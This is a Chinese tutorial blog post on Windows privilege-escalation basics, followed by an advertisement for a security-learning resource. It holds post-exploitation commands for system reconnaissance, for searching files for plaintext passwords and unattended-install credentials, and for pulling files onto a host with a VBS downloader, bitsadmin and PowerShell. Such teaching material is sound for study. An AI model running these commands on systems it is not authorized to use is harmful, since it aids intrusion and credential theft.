Windows权限提升基础知识和命令
介绍
这篇文章是介绍window的权限提升,虽然不是一个全面的指南,但会试图覆盖主要的技术,常用的资源列表在文章底部,可供大家参考。
window权限提升基础知识
初始信息收集
在开始提权之前,我们需要了解操作系统基本的信息,如安装软件,操作系统版本,连接用户,端口进程等信息,
确定操作系统名称和版本
1 | C:\Users\sanr> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” |
查看主机名
1 | C:\Users\sanr> hostname |
查看所有环境变量
1 | C:\Users\sanr> SET |
查看用户跟用户详细信息
1 2 | C:\Users\sanr> net user C:\Users\sanr> net user sanr |
查看在线用户
1 | C:\Users\sanr> query user |
查询终端端口
1 | C:\Users\sanr> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber |
网络连接
让我们来看看该系统的网络设置 – 基本网络,路由,防火墙等。
查看ip dns地址
1 | C:\Users\sanr>ipconfig /all |
要查看路由表
1 | C:\Users\sanr> route print |
要查看ARP缓存:
1 | C:\Users\sanr> arp -A |
查看网络连接
1 | C:\Users\sanr> netstat -ano |
要查看防火墙规则:
1 2 3 | C:\Users\sanr> netstat -ano C:\Users\sanr> netsh firewall show config C:\Users\sanr> netsh firewall show state |
应用程序和服务
查看系统上的计划任务
1 | C:\Users\sanr> schtasks /QUERY /fo LIST /v |
要查看服务的进程ID:
1 | C:\Users\sanr> tasklist /SVC |
要查看已安装驱动程序的列表:
1 | C:\Users\sanr> DRIVERQUERY |
查看已经启动Windows 服务
1 | C:\Users\sanr> net start |
查看某服务启动权限
1 2 3 4 5 6 7 8 9 10 11 12 | C:\Users\sanr> sc qc mysqla [SC] QueryServiceConfig 成功 SERVICE_NAME: mysqla TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : “D:\Program Files\phpstudy\mysql\bin\mysqld.exe” MySQLa LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MySQLa DEPENDENCIES : SERVICE_START_NAME : LocalSystem |
利用WMIC获取有价值的数据
查看其版本的已安装程序的列表
1 | C:\Users\sanr> wmic product list brief |
查看服务,进程或启动程序的列表:
1 2 3 | C:\Users\sanr> wmic service list brief # Lists services C:\Users\sanr> wmic process list brief # Lists processes C:\Users\sanr> wmic startup list brief # Lists startup items |
检查已安装的更新和安装日期
1 | C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn |
搜索,您可以使用提升权限的特定漏洞
1 2 | C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KBxxxxxxx” # Replace with a patch version that you are searching for. Eg – KB3000061 |
执行上面的命令的没有输出,意味着那个补丁未安装。
敏感数据和directories
检查未加密的密码,或敏感信息的文件多汁:
1 2 3 4 5 | C:\Users\sanr> cd/ C:\Users\sanr> dir /b/s password.txt # Will search for all password.txt files on the filesystem. C:\Users\sanr> dir /b/s config.* # Will search for all files starting with ‘config’ on the filesystem. C:\Users\sanr> findstr /si password *.xml *.ini *.txt C:\Users\sanr> findstr /si login *.xml *.ini *.txt |
除此之外,您还可以检查无人值守安装日志文件。这些文件通常包含base64编码的密码。你更可能在大型企业中,其中单个系统的手动安装是不切实际的找到这些文件。这些文件的共同位置是:
1 2 3 4 | C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml |
目录文件操作
列出d:\www的所有目录:
1 | for /d %i in (d:\www\*) do @echo %i |
把当前路径下文件夹的名字只有1-3个字母的显示出来:
1 | for /d %i in (???) do @echo %i |
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
1 | for /r %i in (*.exe) do @echo %i |
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出
1 | for /r “f:\freehost\hmadesign\web\” %i in (*.*) do @echo %i |
显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
1 2 3 4 5 6 7 8 9 10 11 12 | for /f %i in (c:\1.txt) do echo %i RAR 打包 C:\Users\sanr> rar a -k -r -s -m3 c:\1.rar c:\folde php读文件 C:\Users\sanr> c:/php/php.exe “c:/www/admin/1.php” <?php $file_handle = fopen(“f:/config.asp”, “r”); while (! feof($file_handle)) { echo fgets($file_handle); } fclose($file_handle); ?> |
利用系统程序,文件下载
拥有了这些信息,我们现在可以开始实际提升我们的特权的过程。
利用vbs来让我们上传文件,是一个vbs下载者,原理是下载文件到这台计算机(需要访问网络):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | ‘ downloadfile.vbs ‘ Set your settings strFileURL = “http://127.0.0.1/text.ico” strHDLocation = “d:\text.ico” ‘ Fetch the file Set objXMLHTTP = CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”, strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type = 1 ‘adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 ‘Set the stream position to the start Set objFSO = Createobject(“Scripting.FileSystemObject”) If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing |
这个脚本可以在任何版本的Windows上运行,要执行它,如下。
1 | C:\Users\sanr> script.exe downloadfile.vbs |
如果操作系统是Windows7及以上的,使用的bitsadmin跟powershell:
1 2 | C:\Users\sanr> bitsadmin /transfer n http://www.jd.com/favicon.ico d:\text.ico C:\Users\sanr> powershell (new-object System.Net.WebClient).DownloadFile(‘http://www.jd.com/favicon.ico’,’text.ico’) |
下载文件方式还有一些其他的方式,比如ftp php python,可根据自己的需求来选择。
转载于:https://www.cnblogs.com/cnhacker/p/7041119.html
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】